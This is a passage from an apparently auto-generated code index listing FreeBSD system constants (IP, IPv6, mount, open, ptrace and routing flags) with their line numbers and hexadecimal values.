IPV6_MULTICAST_IF (line 880) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 881) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 882) | IPV6_NEXTHOP = 0x30 constant IPV6_ORIGDSTADDR (line 883) | IPV6_ORIGDSTADDR = 0x48 constant IPV6_PATHMTU (line 884) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 885) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 886) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 887) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 888) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 889) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR (line 890) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 891) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVFLOWID (line 892) | IPV6_RECVFLOWID = 0x46 constant IPV6_RECVHOPLIMIT (line 893) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 894) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVORIGDSTADDR (line 895) | IPV6_RECVORIGDSTADDR = 0x48 constant IPV6_RECVPATHMTU (line 896) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 897) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRSSBUCKETID (line 898) | IPV6_RECVRSSBUCKETID = 0x47 constant IPV6_RECVRTHDR (line 899) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 900) | IPV6_RECVTCLASS = 0x39 constant IPV6_RSSBUCKETID (line 901) | IPV6_RSSBUCKETID = 0x45 constant IPV6_RSS_LISTEN_BUCKET (line 902) | IPV6_RSS_LISTEN_BUCKET = 0x42 constant IPV6_RTHDR (line 903) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 904) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 905) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 906) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 907) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 908) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 909) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 910) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 911) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 912) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 913) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 914) | IPV6_VERSION_MASK = 0xf0 constant IPV6_VLAN_PCP (line 915) | IPV6_VLAN_PCP = 0x4b constant IP_ADD_MEMBERSHIP (line 916) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 917) | IP_ADD_SOURCE_MEMBERSHIP = 0x46 constant IP_BINDANY (line 918) | IP_BINDANY = 0x18 constant IP_BINDMULTI (line 919) | IP_BINDMULTI = 0x19 constant IP_BLOCK_SOURCE (line 920) | IP_BLOCK_SOURCE = 0x48 constant IP_DEFAULT_MULTICAST_LOOP (line 921) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 922) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 923) | IP_DF = 0x4000 constant IP_DONTFRAG (line 924) | IP_DONTFRAG = 0x43 constant IP_DROP_MEMBERSHIP (line 925) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 926) | IP_DROP_SOURCE_MEMBERSHIP = 0x47 constant IP_DUMMYNET3 (line 927) | IP_DUMMYNET3 = 0x31 constant IP_DUMMYNET_CONFIGURE (line 928) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 929) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 930) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 931) | IP_DUMMYNET_GET = 0x40 constant IP_FLOWID (line 932) | IP_FLOWID = 0x5a constant IP_FLOWTYPE (line 933) | IP_FLOWTYPE = 0x5b constant IP_FW3 (line 934) | IP_FW3 = 0x30 constant IP_FW_ADD (line 935) | IP_FW_ADD = 0x32 constant IP_FW_DEL (line 936) | IP_FW_DEL = 0x33 constant IP_FW_FLUSH (line 937) | IP_FW_FLUSH = 0x34 constant IP_FW_GET (line 938) | IP_FW_GET = 0x36 constant IP_FW_NAT_CFG (line 939) | IP_FW_NAT_CFG = 0x38 constant IP_FW_NAT_DEL (line 940) | IP_FW_NAT_DEL = 0x39 constant IP_FW_NAT_GET_CONFIG (line 941) | IP_FW_NAT_GET_CONFIG = 0x3a constant IP_FW_NAT_GET_LOG (line 942) | IP_FW_NAT_GET_LOG = 0x3b constant IP_FW_RESETLOG (line 943) | IP_FW_RESETLOG = 0x37 constant IP_FW_TABLE_ADD (line 944) | IP_FW_TABLE_ADD = 0x28 constant IP_FW_TABLE_DEL (line 945) | IP_FW_TABLE_DEL = 0x29 constant IP_FW_TABLE_FLUSH (line 946) | IP_FW_TABLE_FLUSH = 0x2a constant IP_FW_TABLE_GETSIZE (line 947) | IP_FW_TABLE_GETSIZE = 0x2b constant IP_FW_TABLE_LIST (line 948) | IP_FW_TABLE_LIST = 0x2c constant IP_FW_ZERO (line 949) | IP_FW_ZERO = 0x35 constant IP_HDRINCL (line 950) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 951) | IP_IPSEC_POLICY = 0x15 constant IP_MAXPACKET (line 952) | IP_MAXPACKET = 0xffff constant IP_MAX_GROUP_SRC_FILTER (line 953) | IP_MAX_GROUP_SRC_FILTER = 0x200 constant IP_MAX_MEMBERSHIPS (line 954) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MAX_SOCK_MUTE_FILTER (line 955) | IP_MAX_SOCK_MUTE_FILTER = 0x80 constant IP_MAX_SOCK_SRC_FILTER (line 956) | IP_MAX_SOCK_SRC_FILTER = 0x80 constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x42 constant IP_MSFILTER (line 959) | IP_MSFILTER = 0x4a constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 964) | IP_MULTICAST_VIF = 0xe constant IP_OFFMASK (line 965) | IP_OFFMASK = 0x1fff constant IP_ONESBCAST (line 966) | IP_ONESBCAST = 0x17 constant IP_OPTIONS (line 967) | IP_OPTIONS = 0x1 constant IP_ORIGDSTADDR (line 968) | IP_ORIGDSTADDR = 0x1b constant IP_PORTRANGE (line 969) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 970) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 971) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 972) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 973) | IP_RECVDSTADDR = 0x7 constant IP_RECVFLOWID (line 974) | IP_RECVFLOWID = 0x5d constant IP_RECVIF (line 975) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 976) | IP_RECVOPTS = 0x5 constant IP_RECVORIGDSTADDR (line 977) | IP_RECVORIGDSTADDR = 0x1b constant IP_RECVRETOPTS (line 978) | IP_RECVRETOPTS = 0x6 constant IP_RECVRSSBUCKETID (line 979) | IP_RECVRSSBUCKETID = 0x5e constant IP_RECVTOS (line 980) | IP_RECVTOS = 0x44 constant IP_RECVTTL (line 981) | IP_RECVTTL = 0x41 constant IP_RETOPTS (line 982) | IP_RETOPTS = 0x8 constant IP_RF (line 983) | IP_RF = 0x8000 constant IP_RSSBUCKETID (line 984) | IP_RSSBUCKETID = 0x5c constant IP_RSS_LISTEN_BUCKET (line 985) | IP_RSS_LISTEN_BUCKET = 0x1a constant IP_RSVP_OFF (line 986) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 987) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 988) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 989) | IP_RSVP_VIF_ON = 0x11 constant IP_SENDSRCADDR (line 990) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 991) | IP_TOS = 0x3 constant IP_TTL (line 992) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 993) | IP_UNBLOCK_SOURCE = 0x49 constant IP_VLAN_PCP (line 994) | IP_VLAN_PCP = 0x4b constant ISIG (line 995) | ISIG = 0x80 constant ISTRIP (line 996) | ISTRIP = 0x20 constant ITIMER_PROF (line 997) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 998) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 999) | ITIMER_VIRTUAL = 0x1 constant IXANY (line 1000) | IXANY = 0x800 constant IXOFF (line 1001) | IXOFF = 0x400 constant IXON (line 1002) | IXON = 0x200 constant KERN_HOSTNAME (line 1003) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 1004) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 1005) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 1006) | KERN_VERSION = 0x4 constant LOCAL_CONNWAIT (line 1007) | LOCAL_CONNWAIT = 0x4 constant LOCAL_CREDS (line 1008) | LOCAL_CREDS = 0x2 constant LOCAL_PEERCRED (line 1009) | LOCAL_PEERCRED = 0x1 constant LOCAL_VENDOR (line 1010) | LOCAL_VENDOR = 0x80000000 constant LOCK_EX (line 1011) | LOCK_EX = 0x2 constant LOCK_NB (line 1012) | LOCK_NB = 0x4 constant LOCK_SH (line 1013) | LOCK_SH = 0x1 constant LOCK_UN (line 1014) | LOCK_UN = 0x8 constant MADV_AUTOSYNC (line 1015) | MADV_AUTOSYNC = 0x7 constant MADV_CORE (line 1016) | MADV_CORE = 0x9 constant MADV_DONTNEED (line 1017) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1018) | MADV_FREE = 0x5 constant MADV_NOCORE (line 1019) | MADV_NOCORE = 0x8 constant MADV_NORMAL (line 1020) | MADV_NORMAL = 0x0 constant MADV_NOSYNC (line 1021) | MADV_NOSYNC = 0x6 constant MADV_PROTECT (line 1022) | MADV_PROTECT = 0xa constant MADV_RANDOM (line 1023) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1024) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 1025) | MADV_WILLNEED = 0x3 constant MAP_32BIT (line 1026) | MAP_32BIT = 0x80000 constant MAP_ALIGNED_SUPER (line 1027) | MAP_ALIGNED_SUPER = 0x1000000 constant MAP_ALIGNMENT_MASK (line 1028) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 1029) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1030) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1031) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 1032) | MAP_COPY = 0x2 constant MAP_EXCL (line 1033) | MAP_EXCL = 0x4000 constant MAP_FILE (line 1034) | MAP_FILE = 0x0 constant MAP_FIXED (line 1035) | MAP_FIXED = 0x10 constant MAP_GUARD (line 1036) | MAP_GUARD = 0x2000 constant MAP_HASSEMAPHORE (line 1037) | MAP_HASSEMAPHORE = 0x200 constant MAP_NOCORE (line 1038) | MAP_NOCORE = 0x20000 constant MAP_NOSYNC (line 1039) | MAP_NOSYNC = 0x800 constant MAP_PREFAULT_READ (line 1040) | MAP_PREFAULT_READ = 0x40000 constant MAP_PRIVATE (line 1041) | MAP_PRIVATE = 0x2 constant MAP_RESERVED0020 (line 1042) | MAP_RESERVED0020 = 0x20 constant MAP_RESERVED0040 (line 1043) | MAP_RESERVED0040 = 0x40 constant MAP_RESERVED0080 (line 1044) | MAP_RESERVED0080 = 0x80 constant MAP_RESERVED0100 (line 1045) | MAP_RESERVED0100 = 0x100 constant MAP_SHARED (line 1046) | MAP_SHARED = 0x1 constant MAP_STACK (line 1047) | MAP_STACK = 0x400 constant MCAST_BLOCK_SOURCE (line 1048) | MCAST_BLOCK_SOURCE = 0x54 constant MCAST_EXCLUDE (line 1049) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 1050) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 1051) | MCAST_JOIN_GROUP = 0x50 constant MCAST_JOIN_SOURCE_GROUP (line 1052) | MCAST_JOIN_SOURCE_GROUP = 0x52 constant MCAST_LEAVE_GROUP (line 1053) | MCAST_LEAVE_GROUP = 0x51 constant MCAST_LEAVE_SOURCE_GROUP (line 1054) | MCAST_LEAVE_SOURCE_GROUP = 0x53 constant MCAST_UNBLOCK_SOURCE (line 1055) | MCAST_UNBLOCK_SOURCE = 0x55 constant MCAST_UNDEFINED (line 1056) | MCAST_UNDEFINED = 0x0 constant MCL_CURRENT (line 1057) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1058) | MCL_FUTURE = 0x2 constant MNT_ACLS (line 1059) | MNT_ACLS = 0x8000000 constant MNT_ASYNC (line 1060) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 1061) | MNT_AUTOMOUNTED = 0x200000000 constant MNT_BYFSID (line 1062) | MNT_BYFSID = 0x8000000 constant MNT_CMDFLAGS (line 1063) | MNT_CMDFLAGS = 0xd0f0000 constant MNT_DEFEXPORTED (line 1064) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1065) | MNT_DELEXPORT = 0x20000 constant MNT_EXKERB (line 1066) | MNT_EXKERB = 0x800 constant MNT_EXPORTANON (line 1067) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1068) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1069) | MNT_EXPUBLIC = 0x20000000 constant MNT_EXRDONLY (line 1070) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1071) | MNT_FORCE = 0x80000 constant MNT_GJOURNAL (line 1072) | MNT_GJOURNAL = 0x2000000 constant MNT_IGNORE (line 1073) | MNT_IGNORE = 0x800000 constant MNT_LAZY (line 1074) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1075) | MNT_LOCAL = 0x1000 constant MNT_MULTILABEL (line 1076) | MNT_MULTILABEL = 0x4000000 constant MNT_NFS4ACLS (line 1077) | MNT_NFS4ACLS = 0x10 constant MNT_NOATIME (line 1078) | MNT_NOATIME = 0x10000000 constant MNT_NOCLUSTERR (line 1079) | MNT_NOCLUSTERR = 0x40000000 constant MNT_NOCLUSTERW (line 1080) | MNT_NOCLUSTERW = 0x80000000 constant MNT_NOEXEC (line 1081) | MNT_NOEXEC = 0x4 constant MNT_NONBUSY (line 1082) | MNT_NONBUSY = 0x4000000 constant MNT_NOSUID (line 1083) | MNT_NOSUID = 0x8 constant MNT_NOSYMFOLLOW (line 1084) | MNT_NOSYMFOLLOW = 0x400000 constant MNT_NOWAIT (line 1085) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1086) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1087) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1088) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1089) | MNT_ROOTFS = 0x4000 constant MNT_SNAPSHOT (line 1090) | MNT_SNAPSHOT = 0x1000000 constant MNT_SOFTDEP (line 1091) | MNT_SOFTDEP = 0x200000 constant MNT_SUIDDIR (line 1092) | MNT_SUIDDIR = 0x100000 constant MNT_SUJ (line 1093) | MNT_SUJ = 0x100000000 constant MNT_SUSPEND (line 1094) | MNT_SUSPEND = 0x4 constant MNT_SYNCHRONOUS (line 1095) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1096) | MNT_UNION = 0x20 constant MNT_UNTRUSTED (line 1097) | MNT_UNTRUSTED = 0x800000000 constant MNT_UPDATE (line 1098) | MNT_UPDATE = 0x10000 constant MNT_UPDATEMASK (line 1099) | MNT_UPDATEMASK = 0xad8d0807e constant MNT_USER (line 1100) | MNT_USER = 0x8000 constant MNT_VERIFIED (line 1101) | MNT_VERIFIED = 0x400000000 constant MNT_VISFLAGMASK (line 1102) | MNT_VISFLAGMASK = 0xffef0ffff constant MNT_WAIT (line 1103) | MNT_WAIT = 0x1 constant MSG_CMSG_CLOEXEC (line 1104) | MSG_CMSG_CLOEXEC = 0x40000 constant MSG_COMPAT (line 1105) | MSG_COMPAT = 0x8000 constant MSG_CTRUNC (line 1106) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1107) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1108) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1109) | MSG_EOF = 0x100 constant MSG_EOR (line 1110) | MSG_EOR = 0x8 constant MSG_NBIO (line 1111) | MSG_NBIO = 0x4000 constant MSG_NOSIGNAL (line 1112) | MSG_NOSIGNAL = 0x20000 constant MSG_NOTIFICATION (line 1113) | MSG_NOTIFICATION = 0x2000 constant MSG_OOB (line 1114) | MSG_OOB = 0x1 constant MSG_PEEK (line 1115) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1116) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1117) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1118) | MSG_WAITFORONE = 0x80000 constant MS_ASYNC (line 1119) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1120) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1121) | MS_SYNC = 0x0 constant NAME_MAX (line 1122) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1123) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1124) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1125) | NET_RT_IFLIST = 0x3 constant NET_RT_IFLISTL (line 1126) | NET_RT_IFLISTL = 0x5 constant NET_RT_IFMALIST (line 1127) | NET_RT_IFMALIST = 0x4 constant NFDBITS (line 1128) | NFDBITS = 0x40 constant NOFLSH (line 1129) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1130) | NOKERNINFO = 0x2000000 constant NOTE_ABSTIME (line 1131) | NOTE_ABSTIME = 0x10 constant NOTE_ATTRIB (line 1132) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1133) | NOTE_CHILD = 0x4 constant NOTE_CLOSE (line 1134) | NOTE_CLOSE = 0x100 constant NOTE_CLOSE_WRITE (line 1135) | NOTE_CLOSE_WRITE = 0x200 constant NOTE_DELETE (line 1136) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1137) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1138) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1139) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1140) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1141) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1142) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1143) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1144) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1145) | NOTE_FFOR = 0x80000000 constant NOTE_FILE_POLL (line 1146) | NOTE_FILE_POLL = 0x2 constant NOTE_FORK (line 1147) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1148) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1149) | NOTE_LOWAT = 0x1 constant NOTE_MSECONDS (line 1150) | NOTE_MSECONDS = 0x2 constant NOTE_NSECONDS (line 1151) | NOTE_NSECONDS = 0x8 constant NOTE_OPEN (line 1152) | NOTE_OPEN = 0x80 constant NOTE_PCTRLMASK (line 1153) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1154) | NOTE_PDATAMASK = 0xfffff constant NOTE_READ (line 1155) | NOTE_READ = 0x400 constant NOTE_RENAME (line 1156) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1157) | NOTE_REVOKE = 0x40 constant NOTE_SECONDS (line 1158) | NOTE_SECONDS = 0x1 constant NOTE_TRACK (line 1159) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1160) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1161) | NOTE_TRIGGER = 0x1000000 constant NOTE_USECONDS (line 1162) | NOTE_USECONDS = 0x4 constant NOTE_WRITE (line 1163) | NOTE_WRITE = 0x2 constant OCRNL (line 1164) | OCRNL = 0x10 constant ONLCR (line 1165) | ONLCR = 0x2 constant ONLRET (line 1166) | ONLRET = 0x40 constant ONOCR (line 1167) | ONOCR = 0x20 constant ONOEOT (line 1168) | ONOEOT = 0x8 constant OPOST (line 1169) | OPOST = 0x1 constant OXTABS (line 1170) | OXTABS = 0x4 constant O_ACCMODE (line 1171) | O_ACCMODE = 0x3 constant O_APPEND (line 1172) | O_APPEND = 0x8 constant O_ASYNC (line 1173) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1174) | O_CLOEXEC = 0x100000 constant O_CREAT (line 1175) | O_CREAT = 0x200 constant O_DIRECT (line 1176) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 1177) | O_DIRECTORY = 0x20000 constant O_EXCL (line 1178) | O_EXCL = 0x800 constant O_EXEC (line 1179) | O_EXEC = 0x40000 constant O_EXLOCK (line 1180) | O_EXLOCK = 0x20 constant O_FSYNC (line 1181) | O_FSYNC = 0x80 constant O_NDELAY (line 1182) | O_NDELAY = 0x4 constant O_NOCTTY (line 1183) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1184) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1185) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1186) | O_RDONLY = 0x0 constant O_RDWR (line 1187) | O_RDWR = 0x2 constant O_RESOLVE_BENEATH (line 1188) | O_RESOLVE_BENEATH = 0x800000 constant O_SEARCH (line 1189) | O_SEARCH = 0x40000 constant O_SHLOCK (line 1190) | O_SHLOCK = 0x10 constant O_SYNC (line 1191) | O_SYNC = 0x80 constant O_TRUNC (line 1192) | O_TRUNC = 0x400 constant O_TTY_INIT (line 1193) | O_TTY_INIT = 0x80000 constant O_VERIFY (line 1194) | O_VERIFY = 0x200000 constant O_WRONLY (line 1195) | O_WRONLY = 0x1 constant PARENB (line 1196) | PARENB = 0x1000 constant PARMRK (line 1197) | PARMRK = 0x8 constant PARODD (line 1198) | PARODD = 0x2000 constant PENDIN (line 1199) | PENDIN = 0x20000000 constant PIOD_READ_D (line 1200) | PIOD_READ_D = 0x1 constant PIOD_READ_I (line 1201) | PIOD_READ_I = 0x3 constant PIOD_WRITE_D (line 1202) | PIOD_WRITE_D = 0x2 constant PIOD_WRITE_I (line 1203) | PIOD_WRITE_I = 0x4 constant PRIO_PGRP (line 1204) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1205) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1206) | PRIO_USER = 0x2 constant PROT_EXEC (line 1207) | PROT_EXEC = 0x4 constant PROT_NONE (line 1208) | PROT_NONE = 0x0 constant PROT_READ (line 1209) | PROT_READ = 0x1 constant PROT_WRITE (line 1210) | PROT_WRITE = 0x2 constant PTRACE_DEFAULT (line 1211) | PTRACE_DEFAULT = 0x1 constant PTRACE_EXEC (line 1212) | PTRACE_EXEC = 0x1 constant PTRACE_FORK (line 1213) | PTRACE_FORK = 0x8 constant PTRACE_LWP (line 1214) | PTRACE_LWP = 0x10 constant PTRACE_SCE (line 1215) | PTRACE_SCE = 0x2 constant PTRACE_SCX (line 1216) | PTRACE_SCX = 0x4 constant PTRACE_SYSCALL (line 1217) | PTRACE_SYSCALL = 0x6 constant PTRACE_VFORK (line 1218) | PTRACE_VFORK = 0x20 constant PT_ATTACH (line 1219) | PT_ATTACH = 0xa constant PT_CLEARSTEP (line 1220) | PT_CLEARSTEP = 0x10 constant PT_CONTINUE (line 1221) | PT_CONTINUE = 0x7 constant PT_DETACH (line 1222) | PT_DETACH = 0xb constant PT_FIRSTMACH (line 1223) | PT_FIRSTMACH = 0x40 constant PT_FOLLOW_FORK (line 1224) | PT_FOLLOW_FORK = 0x17 constant PT_GETDBREGS (line 1225) | PT_GETDBREGS = 0x25 constant PT_GETFPREGS (line 1226) | PT_GETFPREGS = 0x23 constant PT_GETLWPLIST (line 1227) | PT_GETLWPLIST = 0xf constant PT_GETNUMLWPS (line 1228) | PT_GETNUMLWPS = 0xe constant PT_GETREGS (line 1229) | PT_GETREGS = 0x21 constant PT_GET_EVENT_MASK (line 1230) | PT_GET_EVENT_MASK = 0x19 constant PT_GET_SC_ARGS (line 1231) | PT_GET_SC_ARGS = 0x1b constant PT_GET_SC_RET (line 1232) | PT_GET_SC_RET = 0x1c constant PT_IO (line 1233) | PT_IO = 0xc constant PT_KILL (line 1234) | PT_KILL = 0x8 constant PT_LWPINFO (line 1235) | PT_LWPINFO = 0xd constant PT_LWP_EVENTS (line 1236) | PT_LWP_EVENTS = 0x18 constant PT_READ_D (line 1237) | PT_READ_D = 0x2 constant PT_READ_I (line 1238) | PT_READ_I = 0x1 constant PT_RESUME (line 1239) | PT_RESUME = 0x13 constant PT_SETDBREGS (line 1240) | PT_SETDBREGS = 0x26 constant PT_SETFPREGS (line 1241) | PT_SETFPREGS = 0x24 constant PT_SETREGS (line 1242) | PT_SETREGS = 0x22 constant PT_SETSTEP (line 1243) | PT_SETSTEP = 0x11 constant PT_SET_EVENT_MASK (line 1244) | PT_SET_EVENT_MASK = 0x1a constant PT_STEP (line 1245) | PT_STEP = 0x9 constant PT_SUSPEND (line 1246) | PT_SUSPEND = 0x12 constant PT_SYSCALL (line 1247) | PT_SYSCALL = 0x16 constant PT_TO_SCE (line 1248) | PT_TO_SCE = 0x14 constant PT_TO_SCX (line 1249) | PT_TO_SCX = 0x15 constant PT_TRACE_ME (line 1250) | PT_TRACE_ME = 0x0 constant PT_VM_ENTRY (line 1251) | PT_VM_ENTRY = 0x29 constant PT_VM_TIMESTAMP (line 1252) | PT_VM_TIMESTAMP = 0x28 constant PT_WRITE_D (line 1253) | PT_WRITE_D = 0x5 constant PT_WRITE_I (line 1254) | PT_WRITE_I = 0x4 constant P_ZONEID (line 1255) | P_ZONEID = 0xc constant RLIMIT_AS (line 1256) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1257) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1258) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1259) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1260) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1261) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1262) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1263) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1264) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1265) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1266) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1267) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1268) | RTAX_BRD = 0x7 constant RTAX_DST (line 1269) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1270) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1271) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1272) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1273) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1274) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 1275) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1276) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1277) | RTA_BRD = 0x80 constant RTA_DST (line 1278) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1279) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1280) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1281) | RTA_IFA = 0x20 constant RTA_IFP (line 1282) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1283) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1284) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1285) | RTF_BROADCAST = 0x400000 constant RTF_DONE (line 1286) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1287) | RTF_DYNAMIC = 0x10 constant RTF_FIXEDMTU (line 1288) | RTF_FIXEDMTU = 0x80000 constant RTF_FMASK (line 1289) | RTF_FMASK = 0x1004d808 constant RTF_GATEWAY (line 1290) | RTF_GATEWAY = 0x2 constant RTF_GWFLAG_COMPAT (line 1291) | RTF_GWFLAG_COMPAT = 0x80000000 constant RTF_HOST (line 1292) | RTF_HOST = 0x4 constant RTF_LLDATA (line 1293) | RTF_LLDATA = 0x400 constant RTF_LLINFO (line 1294) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 